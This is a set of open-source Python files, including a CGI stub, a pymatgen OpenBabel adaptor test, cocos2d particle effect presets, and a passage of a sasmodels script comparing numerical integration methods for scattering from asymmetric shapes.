#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# -- END_HEADER ---
#
import cgi
import cgitb
cgitb.enable()
from shared.functionality.editor import main
from shared.cgiscriptstub import run_cgi_script
run_cgi_script(main)
|
heromod/migrid
|
mig/cgi-bin/editor.py
|
Python
|
gpl-2.0
| 1,100
|
[
"Brian"
] |
530791734d4622a3cce400fbfacfe7a5e02887de1bfda3695c48d66d9eb0dfb6
|
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
from __future__ import division, unicode_literals
"""
Created on Apr 28, 2012
"""
__author__ = "Shyue Ping Ong"
__copyright__ = "Copyright 2012, The Materials Project"
__version__ = "0.1"
__maintainer__ = "Shyue Ping Ong"
__email__ = "shyuep@gmail.com"
__date__ = "Apr 28, 2012"
import unittest
import os
from pymatgen.core.structure import Molecule
from pymatgen.io.xyz import XYZ
from pymatgen.io.babel import BabelMolAdaptor
test_dir = os.path.join(os.path.dirname(__file__), "..", "..", "..",
"test_files", "molecules")
try:
import openbabel as ob
import pybel as pb
except ImportError:
pb = None
ob = None
@unittest.skipIf(not (pb and ob), "OpenBabel not present. Skipping...")
class BabelMolAdaptorTest(unittest.TestCase):
def setUp(self):
coords = [[0.000000, 0.000000, 0.000000],
[0.000000, 0.000000, 1.089000],
[1.026719, 0.000000, -0.363000],
[-0.513360, -0.889165, -0.363000],
[-0.513360, 0.889165, -0.363000]]
self.mol = Molecule(["C", "H", "H", "H", "H"], coords)
def test_init(self):
adaptor = BabelMolAdaptor(self.mol)
obmol = adaptor.openbabel_mol
self.assertEqual(obmol.NumAtoms(), 5)
adaptor = BabelMolAdaptor(adaptor.openbabel_mol)
self.assertEqual(adaptor.pymatgen_mol.formula, "H4 C1")
def test_from_file(self):
adaptor = BabelMolAdaptor.from_file(
os.path.join(test_dir, "Ethane_e.pdb"), "pdb")
mol = adaptor.pymatgen_mol
self.assertEqual(mol.formula, "H6 C2")
def test_from_string(self):
xyz = XYZ(self.mol)
adaptor = BabelMolAdaptor.from_string(str(xyz), "xyz")
mol = adaptor.pymatgen_mol
self.assertEqual(mol.formula, "H4 C1")
def test_localopt(self):
self.mol[1] = "H", [0, 0, 1.05]
adaptor = BabelMolAdaptor(self.mol)
adaptor.localopt()
optmol = adaptor.pymatgen_mol
for site in optmol[1:]:
self.assertAlmostEqual(site.distance(optmol[0]), 1.09216, 2)
if __name__ == "__main__":
unittest.main()
|
sonium0/pymatgen
|
pymatgen/io/tests/test_babel.py
|
Python
|
mit
| 2,260
|
[
"Pybel",
"pymatgen"
] |
9778c08bec9c7422907c91bb7bc923b1fec99f3eef3d519e6bad2922d38d9599
|
# ----------------------------------------------------------------------------
# cocos2d
# Copyright (c) 2008-2012 Daniel Moisset, Ricardo Quesada, Rayentray Tappa,
# Lucio Torre
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of cocos2d nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
'''Pre-defined Particle Systems'''
__all__ = ['Fireworks', 'Spiral', 'Meteor', 'Sun', 'Fire', 'Galaxy', 'Flower', 'Explosion', 'Smoke']
from particle import ParticleSystem, Color
from euclid import Point2
class Fireworks( ParticleSystem ):
# total particles
total_particles = 3000
# duration
duration = -1
# gravity
gravity = Point2(0,-90)
# angle
angle = 90
angle_var = 20
# radial
radial_accel = 0
radial_accel_var = 0
# speed of particles
speed = 180
speed_var = 50
# emitter variable position
pos_var = Point2(0,0)
# life of particles
life = 3.5
life_var = 1
# emits per frame
emission_rate = total_particles / life
# color of particles
start_color = Color(0.5,0.5,0.5,1.0)
start_color_var = Color(0.5, 0.5, 0.5, 1.0)
end_color = Color(0.1,0.1,0.1,0.2)
end_color_var = Color(0.1,0.1,0.1,0.2)
# size, in pixels
size = 8.0
size_var = 2.0
# blend additive
blend_additive = False
# color modulate
color_modulate = True
class Explosion( ParticleSystem ):
# total particle
total_particles = 700
# duration
duration = 0.1
# gravity
gravity = Point2(0,-90)
# angle
angle = 90.0
angle_var = 360.0
# radial
radial_accel = 0
radial_accel_var = 0
# speed of particles
speed = 70.0
speed_var = 40.0
# emitter variable position
pos_var = Point2(0,0)
# life of particles
life = 5.0
life_var = 2.0
# emits per frame
emission_rate = total_particles / duration
# color of particles
start_color = Color(0.7, 0.2, 0.1, 1.0)
start_color_var = Color(0.5, 0.5, 0.5, 0.0)
end_color = Color(0.5, 0.5, 0.5, 0.0)
end_color_var = Color(0.5, 0.5, 0.5, 0.0)
# size, in pixels
size = 15.0
size_var = 10.0
# blend additive
blend_additive = False
# color modulate
color_modulate = True
class Fire( ParticleSystem ):
# total particles
total_particles = 250
# duration
duration = -1
# gravity
gravity = Point2(0,0)
# angle
angle = 90.0
angle_var = 10.0
# radial
radial_accel = 0
radial_accel_var = 0
# speed of particles
speed = 60.0
speed_var = 20.0
# emitter variable position
pos_var = Point2(40, 20)
# life of particles
life = 3.0
life_var = 0.25
# emits per frame
emission_rate = total_particles / life
# color of particles
start_color = Color(0.76, 0.25, 0.12, 1.0)
start_color_var = Color(0.0, 0.0, 0.0, 0.0)
end_color = Color(0.0, 0.0, 0.0, 1.0)
end_color_var = Color(0.0, 0.0, 0.0, 0.0)
# size, in pixels
size = 100.0
size_var = 10.0
# blend additive
blend_additive = True
# color modulate
color_modulate = True
class Flower( ParticleSystem ):
# total particles
total_particles = 500
# duration
duration = -1
# gravity
gravity = Point2( 0, 0)
# angle
angle = 90.0
angle_var = 360.0
# speed of particles
speed = 80.0
speed_var = 10.0
# radial
radial_accel = -60
radial_accel_var = 0
# tangential
tangential_accel = 15.0
tangential_accel_var = 0.0
# emitter variable position
pos_var = Point2(0,0)
# life of particles
life = 4.0
life_var = 1.0
# emits per frame
emission_rate = total_particles / life
# color of particles
start_color = Color(0.5, 0.5, 0.5, 1.0)
start_color_var = Color(0.5, 0.5, 0.5, 0.0)
end_color = Color(0.0, 0.0, 0.0, 1.0)
end_color_var = Color(0.0, 0.0, 0.0, 0.0)
# size, in pixels
size = 30.0
size_var = 0.0
# blend additive
blend_additive = True
# color modulate
color_modulate = True
class Sun( ParticleSystem ):
# total particles
total_particles = 350
# duration
duration = -1
# gravity
gravity = Point2(0,0)
# angle
angle = 90.0
angle_var = 360.0
# speed of particles
speed = 20.0
speed_var = 5.0
# radial
radial_accel = 0
radial_accel_var = 0
# tangential
tangential_accel = 0.0
tangential_accel_var = 0.0
# emitter variable position
pos_var = Point2(0, 0)
# life of particles
life = 1.0
life_var = 0.5
# emits per frame
emission_rate = total_particles / life
# color of particles
start_color = Color(0.75, 0.25, 0.12, 1.0)
start_color_var = Color(0.0, 0.0, 0.0, 0.0)
end_color = Color(0.0, 0.0, 0.0, 0.0)
end_color_var = Color(0.0, 0.0, 0.0, 0.0)
# size, in pixels
size = 40.0
size_var = 00.0
# blend additive
blend_additive = True
# color modulate
color_modulate = True
class Spiral( ParticleSystem ):
# total paticles
total_particles = 500
# duration
duration = -1
# gravity
gravity = Point2(0,0)
# angle
angle = 90.0
angle_var = 0.0
# speed of particles
speed = 150.0
speed_var = 0.0
# radial
radial_accel = -380
radial_accel_var = 0
# tangential
tangential_accel = 45.0
tangential_accel_var = 0.0
# emitter variable position
pos_var = Point2(0,0)
# life of particles
life = 12.0
life_var = 0.0
# emits per frame
emission_rate = total_particles / life
# color of particles
start_color = Color(0.5, 0.5, 0.5, 1.0)
start_color_var = Color(0.5, 0.5, 0.5, 0.0)
end_color = Color(0.5, 0.5, 0.5, 1.0)
end_color_var = Color(0.5, 0.5, 0.5, 0.0)
# size, in pixels
size = 20.0
size_var = 10.0
# blend additive
blend_additive = True
# color modulate
color_modulate = True
class Meteor( ParticleSystem ):
# total particles
total_particles = 150
# duration
duration = -1
# gravity
gravity = Point2(-200,100)
# angle
angle = 90.0
angle_var = 360.0
# speed of particles
speed = 15.0
speed_var = 5.0
# radial
radial_accel = 0
radial_accel_var = 0
# tangential
tangential_accel = 0.0
tangential_accel_var = 0.0
# emitter variable position
pos_var = Point2(0,0)
# life of particles
life = 2.0
life_var = 1.0
# size, in pixels
size = 60.0
size_var = 10.0
# emits per frame
emission_rate = total_particles / life
# color of particles
start_color = Color(0.2, 0.7, 0.7, 1.0)
start_color_var = Color(0.0, 0.0, 0.0, 0.2)
end_color = Color(0.0, 0.0, 0.0, 1.0)
end_color_var = Color(0.0, 0.0, 0.0, 0.0)
# blend additive
blend_additive = True
# color modulate
color_modulate = True
class Galaxy( ParticleSystem ):
# total particles
total_particles = 200
# duration
duration = -1
# gravity
gravity = Point2(0,0)
# angle
angle = 90.0
angle_var = 360.0
# speed of particles
speed = 60.0
speed_var = 10.0
# radial
radial_accel = -80.0
radial_accel_var = 0
# tangential
tangential_accel = 80.0
tangential_accel_var = 0.0
# emitter variable position
pos_var = Point2(0,0)
# life of particles
life = 4.0
life_var = 1.0
# size, in pixels
size = 37.0
size_var = 10.0
# emits per frame
emission_rate = total_particles / life
# color of particles
start_color = Color(0.12, 0.25, 0.76, 1.0)
start_color_var = Color(0.0, 0.0, 0.0, 0.0)
end_color = Color(0.0, 0.0, 0.0, 0.0)
end_color_var = Color(0.0, 0.0, 0.0, 0.0)
# blend additive
blend_additive = True
# color modulate
color_modulate = True
class Smoke( ParticleSystem ):
# total particles
total_particles = 80
# duration
duration = -1
# gravity
gravity = Point2(0,0)
# angle
angle = 90.0
angle_var = 10.0
# speed of particles
speed = 25.0
speed_var = 10.0
# radial
radial_accel = 5
radial_accel_var = 0
# tangential
tangential_accel = 0.0
tangential_accel_var = 0.0
# emitter variable position
pos_var = Point2(0.1,0)
# life of particles
life = 4.0
life_var = 1.0
# size, in pixels
size = 40.0
size_var = 10.0
# emits per frame
emission_rate = total_particles / life
start_color = Color(0.5,0.5,0.5,0.1)
start_color_var = Color(0,0,0,0.1)
end_color = Color(0.5,0.5,0.5,0.1)
end_color_var = Color(0,0,0,0.1)
# blend additive
blend_additive = True
# color modulate
color_modulate = False
|
shadowmint/nwidget
|
lib/cocos2d-0.5.5/cocos/particle_systems.py
|
Python
|
apache-2.0
| 10,826
|
[
"Galaxy"
] |
a8e5776b55dbe81d5a125952111483122eb38ad877de6753934304b43848d994
|
#!/usr/bin/env python
"""
Asymmetric shape integration
Usage:
explore/asymint.py [MODEL] [q-value]
Computes the numerical integral over theta and phi of the given model at a
single point q using different algorithms or the same algorithm with different
precision. It also displays a 2-D image of the theta-phi surface that is
being integrated.
The available models are:
triaxial_ellipsoid, parallelpiped, paracrystal, cylinder, sphere
Cylinder and sphere are included as simple checks on the integration
algorithms. Cylinder is better investigated using 1-D integration methods in
explore/symint.py. Sphere has an easily computed analytic value which is
identical for all theta-phi for a given q, so it is useful for checking
that the normalization constants are correct for the different algorithms.
"""
from __future__ import print_function, division
import os, sys
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.realpath(__file__))))
import warnings
import numpy as np
import mpmath as mp
from numpy import pi, sin, cos, sqrt, exp, expm1, degrees, log10, arccos
from numpy.polynomial.legendre import leggauss
from scipy.integrate import dblquad, simps, romb, romberg
import pylab
import sasmodels.special as sp
DTYPE = 'd'
class MPenv:
sqrt = staticmethod(mp.sqrt)
exp = staticmethod(mp.exp)
expm1 = staticmethod(mp.expm1)
cos = staticmethod(mp.cos)
sin = staticmethod(mp.sin)
tan = staticmethod(mp.tan)
@staticmethod
def sas_3j1x_x(x):
return 3*(mp.sin(x)/x - mp.cos(x))/(x*x)
@staticmethod
def sas_2J1x_x(x):
return 2*mp.j1(x)/x
@staticmethod
def sas_sinx_x(x):
return mp.sin(x)/x
pi = mp.pi
mpf = staticmethod(mp.mpf)
class NPenv:
sqrt = staticmethod(np.sqrt)
exp = staticmethod(np.exp)
expm1 = staticmethod(np.expm1)
cos = staticmethod(np.cos)
sin = staticmethod(np.sin)
tan = staticmethod(np.tan)
sas_3j1x_x = staticmethod(sp.sas_3j1x_x)
sas_2J1x_x = staticmethod(sp.sas_2J1x_x)
sas_sinx_x = staticmethod(sp.sas_sinx_x)
pi = np.pi
#mpf = staticmethod(float)
mpf = staticmethod(lambda x: np.array(x, DTYPE))
SLD = 3
SLD_SOLVENT = 6
CONTRAST = SLD - SLD_SOLVENT
# Carefully code models so that mpmath will use full precision. That means:
# * wrap inputs in env.mpf
# * don't use floating point constants, only integers
# * for division, make sure the numerator or denominator is env.mpf
# * use env.pi, env.sas_sinx_x, etc. for functions
def make_parallelepiped(a, b, c, env=NPenv):
a, b, c = env.mpf(a), env.mpf(b), env.mpf(c)
def Fq(qa, qb, qc):
siA = env.sas_sinx_x(a*qa/2)
siB = env.sas_sinx_x(b*qb/2)
siC = env.sas_sinx_x(c*qc/2)
return siA * siB * siC
Fq.__doc__ = "parallelepiped a=%g, b=%g c=%g"%(a, b, c)
volume = a*b*c
norm = CONTRAST**2*volume/10000
return norm, Fq
def make_core_shell_parallelepiped(a, b, c, da, db, dc, slda, sldb, sldc, env=NPenv):
overlapping = False
a, b, c = env.mpf(a), env.mpf(b), env.mpf(c)
da, db, dc = env.mpf(da), env.mpf(db), env.mpf(dc)
slda, sldb, sldc = env.mpf(slda), env.mpf(sldb), env.mpf(sldc)
dr0 = CONTRAST
drA, drB, drC = slda-SLD_SOLVENT, sldb-SLD_SOLVENT, sldc-SLD_SOLVENT
tA, tB, tC = a + 2*da, b + 2*db, c + 2*dc
def Fq(qa, qb, qc):
siA = a*env.sas_sinx_x(a*qa/2)
siB = b*env.sas_sinx_x(b*qb/2)
siC = c*env.sas_sinx_x(c*qc/2)
siAt = tA*env.sas_sinx_x(tA*qa/2)
siBt = tB*env.sas_sinx_x(tB*qb/2)
siCt = tC*env.sas_sinx_x(tC*qc/2)
if overlapping:
return (dr0*siA*siB*siC
+ drA*(siAt-siA)*siB*siC
+ drB*siAt*(siBt-siB)*siC
+ drC*siAt*siBt*(siCt-siC))
else:
return (dr0*siA*siB*siC
+ drA*(siAt-siA)*siB*siC
+ drB*siA*(siBt-siB)*siC
+ drC*siA*siB*(siCt-siC))
Fq.__doc__ = "core-shell parallelepiped a=%g, b=%g c=%g"%(a, b, c)
if overlapping:
volume = a*b*c + 2*da*b*c + 2*tA*db*c + 2*tA*tB*dc
else:
volume = a*b*c + 2*da*b*c + 2*a*db*c + 2*a*b*dc
norm = 1/(volume*10000)
return norm, Fq
def make_triaxial_ellipsoid(a, b, c, env=NPenv):
a, b, c = env.mpf(a), env.mpf(b), env.mpf(c)
def Fq(qa, qb, qc):
qr = env.sqrt((a*qa)**2 + (b*qb)**2 + (c*qc)**2)
return env.sas_3j1x_x(qr)
Fq.__doc__ = "triaxial ellipsoid minor=%g, major=%g polar=%g"%(a, b, c)
volume = 4*env.pi*a*b*c/3
norm = CONTRAST**2*volume/10000
return norm, Fq
def make_cylinder(radius, length, env=NPenv):
radius, length = env.mpf(radius), env.mpf(length)
def Fq(qa, qb, qc):
qab = env.sqrt(qa**2 + qb**2)
return env.sas_2J1x_x(qab*radius) * env.sas_sinx_x((qc*length)/2)
Fq.__doc__ = "cylinder radius=%g, length=%g"%(radius, length)
volume = env.pi*radius**2*length
norm = CONTRAST**2*volume/10000
return norm, Fq
def make_sphere(radius, env=NPenv):
radius = env.mpf(radius)
def Fq(qa, qb, qc):
q = env.sqrt(qa**2 + qb**2 + qc**2)
return env.sas_3j1x_x(q*radius)
Fq.__doc__ = "sphere radius=%g"%(radius, )
volume = 4*pi*radius**3
norm = CONTRAST**2*volume/10000
return norm, Fq
def make_paracrystal(radius, dnn, d_factor, lattice='bcc', env=NPenv):
radius, dnn, d_factor = env.mpf(radius), env.mpf(dnn), env.mpf(d_factor)
def sc(qa, qb, qc):
return qa, qb, qc
def bcc(qa, qb, qc):
a1 = (+qa + qb + qc)/2
a2 = (-qa - qb + qc)/2
a3 = (-qa + qb - qc)/2
return a1, a2, a3
def fcc(qa, qb, qc):
a1 = ( 0 + qb + qc)/2
a2 = (-qa + 0 + qc)/2
a3 = (-qa + qb + 0)/2
return a1, a2, a3
lattice_fn = {'sc': sc, 'bcc': bcc, 'fcc': fcc}[lattice]
radius, dnn, d_factor = env.mpf(radius), env.mpf(dnn), env.mpf(d_factor)
def Fq(qa, qb, qc):
a1, a2, a3 = lattice_fn(qa, qb, qc)
# Note: paper says that different directions can have different
# distoration factors. Easy enough to add to the code.
arg = -(dnn*d_factor)**2*(a1**2 + a2**2 + a3**2)/2
exp_arg = env.exp(arg)
den = [((exp_arg - 2*env.cos(dnn*a))*exp_arg + 1) for a in (a1, a2, a3)]
Sq = -env.expm1(2*arg)**3/(den[0]*den[1]*den[2])
q = env.sqrt(qa**2 + qb**2 + qc**2)
Fq = env.sas_3j1x_x(q*radius)
# the caller computes F(q)**2, but we need it to compute S(q)*F(q)**2
return env.sqrt(Sq)*Fq
Fq.__doc__ = "%s paracrystal a=%g da=%g r=%g"%(lattice, dnn, d_factor, radius)
def sphere_volume(r): return 4*env.pi*r**3/3
Vf = {
'sc': sphere_volume(radius/dnn),
'bcc': 2*sphere_volume(env.sqrt(3)/2*radius/dnn),
'fcc': 4*sphere_volume(1/env.sqrt(2)*radius/dnn),
}[lattice]
volume = sphere_volume(radius)
norm = CONTRAST**2*volume/10000*Vf
return norm, Fq
NORM = 1.0 # type: float
KERNEL = None # type: CALLABLE[[ndarray, ndarray, ndarray], ndarray]
NORM_MP = 1 # type: mpf
KERNEL = None # type: CALLABLE[[mpf, mpf, mpf], mpf]
SHAPES = [
'sphere',
'cylinder',
'triaxial_ellipsoid',
'parallelepiped',
'core_shell_parallelepiped',
'fcc_paracrystal',
'bcc_paracrystal',
'sc_paracrystal',
]
def build_shape(shape, **pars):
global NORM, KERNEL
global NORM_MP, KERNEL_MP
# Note: using integer or string defaults for the sake of mpf
if shape == 'sphere':
RADIUS = pars.get('radius', 50)
NORM, KERNEL = make_sphere(radius=RADIUS)
NORM_MP, KERNEL_MP = make_sphere(radius=RADIUS, env=MPenv)
elif shape == 'cylinder':
#RADIUS, LENGTH = 10, 100000
RADIUS = pars.get('radius', 10)
LENGTH = pars.get('radius', 300)
NORM, KERNEL = make_cylinder(radius=RADIUS, length=LENGTH)
NORM_MP, KERNEL_MP = make_cylinder(radius=RADIUS, length=LENGTH, env=MPenv)
elif shape == 'triaxial_ellipsoid':
#A, B, C = 4450, 14000, 47
A = pars.get('a', 445)
B = pars.get('b', 140)
C = pars.get('c', 47)
NORM, KERNEL = make_triaxial_ellipsoid(A, B, C)
NORM_MP, KERNEL_MP = make_triaxial_ellipsoid(A, B, C, env=MPenv)
elif shape == 'parallelepiped':
#A, B, C = 4450, 14000, 47
A = pars.get('a', 445)
B = pars.get('b', 140)
C = pars.get('c', 47)
NORM, KERNEL = make_parallelepiped(A, B, C)
NORM_MP, KERNEL_MP = make_parallelepiped(A, B, C, env=MPenv)
elif shape == 'core_shell_parallelepiped':
#A, B, C = 4450, 14000, 47
#A, B, C = 445, 140, 47 # integer for the sake of mpf
A = pars.get('a', 114)
B = pars.get('b', 1380)
C = pars.get('c', 6800)
DA = pars.get('da', 21)
DB = pars.get('db', 58)
DC = pars.get('dc', 2300)
SLDA = pars.get('slda', "5")
SLDB = pars.get('sldb', "-0.3")
SLDC = pars.get('sldc', "11.5")
## default parameters from sasmodels
#A,B,C,DA,DB,DC,SLDA,SLDB,SLDC = 400,75,35,10,10,10,2,4,2
## swap A-B-C to C-B-A
#A, B, C, DA, DB, DC, SLDA, SLDB, SLDC = C, B, A, DC, DB, DA, SLDC, SLDB, SLDA
#A,B,C,DA,DB,DC,SLDA,SLDB,SLDC = 10,20,30,100,200,300,1,2,3
#SLD_SOLVENT,CONTRAST = 0, 4
if 1: # C shortest
B, C = C, B
DB, DC = DC, DB
SLDB, SLDC = SLDC, SLDB
elif 0: # C longest
A, C = C, A
DA, DC = DC, DA
SLDA, SLDC = SLDC, SLDA
#NORM, KERNEL = make_core_shell_parallelepiped(A, B, C, DA, DB, DC, SLDA, SLDB, SLDC)
NORM, KERNEL = make_core_shell_parallelepiped(A, B, C, DA, DB, DC, SLDA, SLDB, SLDC)
NORM_MP, KERNEL_MP = make_core_shell_parallelepiped(A, B, C, DA, DB, DC, SLDA, SLDB, SLDC, env=MPenv)
elif shape.endswith('paracrystal'):
LATTICE, _ = shape.split('_')
DNN = pars.get('dnn', 220)
D_FACTOR = pars.get('d_factor', '0.06')
RADIUS = pars.get('radius', 40)
NORM, KERNEL = make_paracrystal(
radius=RADIUS, dnn=DNN, d_factor=D_FACTOR, lattice=LATTICE)
NORM_MP, KERNEL_MP = make_paracrystal(
radius=RADIUS, dnn=DNN, d_factor=D_FACTOR, lattice=LATTICE, env=MPenv)
else:
raise ValueError("Unknown shape %r"%shape)
# Note: hardcoded in mp_quad
THETA_LOW, THETA_HIGH = 0, pi
PHI_LOW, PHI_HIGH = 0, 2*pi
SCALE = 1
# mathematica code for triaxial_ellipsoid (untested)
_ = """
R[theta_, phi_, a_, b_, c_] := Sqrt[(a Sin[theta]Cos[phi])^2 + (b Sin[theta]Sin[phi])^2 + (c Cos[theta])^2]
Sphere[q_, r_] := 3 SphericalBesselJ[q r]/(q r)
V[a_, b_, c_] := 4/3 pi a b c
Norm[sld_, solvent_, a_, b_, c_] := V[a, b, c] (solvent - sld)^2
F[q_, theta_, phi_, a_, b_, c_] := Sphere[q, R[theta, phi, a, b, c]]
I[q_, sld_, solvent_, a_, b_, c_] := Norm[sld, solvent, a, b, c]/(4 pi) Integrate[F[q, theta, phi, a, b, c]^2 Sin[theta], {phi, 0, 2 pi}, {theta, 0, pi}]
I[6/10^3, 63/10, 3, 445, 140, 47]
"""
# 2D integration functions
def mp_quad_2d(q):
evals = [0]
def integrand(theta, phi):
evals[0] += 1
qab = q*mp.sin(theta)
qa = qab*mp.cos(phi)
qb = qab*mp.sin(phi)
qc = q*mp.cos(theta)
Zq = KERNEL_MP(qa, qb, qc)**2
return Zq*mp.sin(theta)
ans = mp.quad(integrand, (0, mp.pi), (0, 2*mp.pi))
Iq = NORM_MP*ans/(4*mp.pi)
return evals[0], Iq
def kernel_2d(q, theta, phi):
"""
S(q) kernel for paracrystal forms.
"""
qab = q*sin(theta)
qa = qab*cos(phi)
qb = qab*sin(phi)
qc = q*cos(theta)
return NORM*KERNEL(qa, qb, qc)**2
def scipy_dblquad_2d(q):
"""
Compute the integral using scipy dblquad. This gets the correct answer
eventually, but it is slow.
"""
evals = [0]
def integrand(phi, theta):
evals[0] += 1
Zq = kernel_2d(q, theta=theta, phi=phi)
return Zq*sin(theta)
ans = dblquad(integrand, THETA_LOW, THETA_HIGH, lambda x: PHI_LOW, lambda x: PHI_HIGH)[0]
return evals[0], ans*SCALE/(4*pi)
def scipy_romberg_2d(q):
"""
Compute the integral using romberg integration. This function does not
complete in a reasonable time. No idea if it is accurate.
"""
evals = [0]
def inner(phi, theta):
evals[0] += 1
return kernel_2d(q, theta=theta, phi=phi)
def outer(theta):
Zq = romberg(inner, PHI_LOW, PHI_HIGH, divmax=100, args=(theta,))
return Zq*sin(theta)
ans = romberg(outer, THETA_LOW, THETA_HIGH, divmax=100)
return evals[0], ans*SCALE/(4*pi)
def semi_romberg_2d(q, n=100):
"""
Use 1D romberg integration in phi and regular simpsons rule in theta.
"""
evals = [0]
def inner(phi, theta):
evals[0] += 1
return kernel_2d(q, theta=theta, phi=phi)
theta = np.linspace(THETA_LOW, THETA_HIGH, n)
Zq = [romberg(inner, PHI_LOW, PHI_HIGH, divmax=100, args=(t,)) for t in theta]
ans = simps(np.array(Zq)*sin(theta), dx=theta[1]-theta[0])
return evals[0], ans*SCALE/(4*pi)
def gauss_quad_2d(q, n=150):
"""
Compute the integral using gaussian quadrature for n = 20, 76 or 150.
"""
z, w = leggauss(n)
theta = (THETA_HIGH-THETA_LOW)*(z + 1)/2 + THETA_LOW
phi = (PHI_HIGH-PHI_LOW)*(z + 1)/2 + PHI_LOW
Atheta, Aphi = np.meshgrid(theta, phi)
Aw = w[None, :] * w[:, None]
sin_theta = abs(sin(Atheta))
Zq = kernel_2d(q=q, theta=Atheta, phi=Aphi)
# change from [-1,1] x [-1,1] range to [0, pi] x [0, 2 pi] range
dxdy_stretch = (THETA_HIGH-THETA_LOW)/2 * (PHI_HIGH-PHI_LOW)/2
Iq = np.sum(Zq*Aw*sin_theta)*SCALE/(4*pi) * dxdy_stretch
return n**2, Iq
def gauss_quad_usub(q, n=150, dtype=DTYPE):
"""
Compute the integral using gaussian quadrature for n = 20, 76 or 150.
Use *u = sin theta* substitution, and restrict integration over a single
quadrant for shapes that are mirror symmetric about AB, AC and BC planes.
Note that this doesn't work for fcc/bcc paracrystals, which instead step
over the entire 4 pi surface uniformly in theta-phi.
"""
z, w = leggauss(n)
cos_theta = 0.5 * (z + 1)
theta = arccos(cos_theta)
phi = pi/2*(0.5 * (z + 1))
Atheta, Aphi = np.meshgrid(theta, phi)
Aw = w[None, :] * w[:, None]
q, Atheta, Aphi, Aw = [np.asarray(v, dtype=dtype) for v in (q, Atheta, Aphi, Aw)]
Zq = kernel_2d(q=q, theta=Atheta, phi=Aphi)
Iq = np.sum(Zq*Aw)*0.25
return n**2, Iq
def gridded_2d(q, n=300):
"""
Compute the integral on a regular grid using rectangular, trapezoidal,
simpsons, and romberg integration. Romberg integration requires that
the grid be of size n = 2**k + 1.
"""
theta = np.linspace(THETA_LOW, THETA_HIGH, n)
phi = np.linspace(PHI_LOW, PHI_HIGH, n)
Atheta, Aphi = np.meshgrid(theta, phi)
Zq = kernel_2d(q=q, theta=Atheta, phi=Aphi)
Zq *= abs(sin(Atheta))
dx, dy = theta[1]-theta[0], phi[1]-phi[0]
print("rect-%d"%n, n**2, np.sum(Zq)*dx*dy*SCALE/(4*pi))
print("trapz-%d"%n, n**2, np.trapz(np.trapz(Zq, dx=dx), dx=dy)*SCALE/(4*pi))
print("simpson-%d"%n, n**2, simps(simps(Zq, dx=dx), dx=dy)*SCALE/(4*pi))
print("romb-%d"%n, n**2, romb(romb(Zq, dx=dx), dx=dy)*SCALE/(4*pi))
def quadpy_method(q, rule):
"""
Use *rule*="name:index" where name and index are chosen from below.
Available rule names and the corresponding indices::
AlbrechtCollatz: [1-5]
BazantOh: 9, 11, 13
HeoXu: 13, 15, 17, 19-[1-2], 21-[1-6], 23-[1-3], 25-[1-2], 27-[1-3],
29, 31, 33, 35, 37, 39-[1-2]
FliegeMaier: 4, 9, 16, 25
Lebedev: 3[a-c], 5, 7, 9, 11, 13, 15, 17, 19, 21, 23, 25, 27, 29, 31, 35,
41, 47, 53, 59, 65, 71, 77 83, 89, 95, 101, 107, 113, 119, 125, 131
McLaren: [1-10]
Stroud: U3 3-1, U3 5-[1-5], U3 7-[1-2], U3 8-1, U3 9-[1-3],
U3 11-[1-3], U3 14-1
"""
try:
import quadpy
except ImportError:
warnings.warn("use 'pip install quadpy' to enable quadpy.sphere tests")
return
from quadpy.sphere import (AlbrechtCollatz, BazantOh, HeoXu,
FliegeMaier, Lebedev, McLaren, Stroud, integrate_spherical)
RULES = {
'AlbrechtCollatz': AlbrechtCollatz,
'BazantOh': BazantOh,
'HeoXu': HeoXu,
'FliegeMaier': FliegeMaier,
'Lebedev': Lebedev,
'McLaren': McLaren,
'Stroud': Stroud,
}
int_index = 'AlbrechtCollatz', 'McLaren'
rule_name, rule_index = rule.split(':')
index = int(rule_index) if rule_name in int_index else rule_index
rule_obj = RULES[rule_name](index)
fn = lambda azimuthal, polar: kernel_2d(q=q, theta=polar, phi=azimuthal)
Iq = integrate_spherical(fn, rule=rule_obj)/(4*pi)
print("%s degree=%d points=%s => %.15g"
% (rule, rule_obj.degree, len(rule_obj.points), Iq))
def plot_2d(q, n=300):
"""
Plot the 2D surface that needs to be integrated in order to compute
the BCC S(q) at a particular q, dnn and d_factor. *n* is the number
of points in the grid.
"""
theta = np.linspace(THETA_LOW, THETA_HIGH, n)
phi = np.linspace(PHI_LOW, PHI_HIGH, n)
Atheta, Aphi = np.meshgrid(theta, phi)
Zq = kernel_2d(q=q, theta=Atheta, phi=Aphi)
#Zq *= abs(sin(Atheta))
pylab.pcolor(degrees(theta), degrees(phi), log10(np.fmax(Zq, 1.e-6)))
pylab.axis('tight')
pylab.title("%s I(q,t) sin(t) for q=%g" % (KERNEL.__doc__, q))
pylab.xlabel("theta (degrees)")
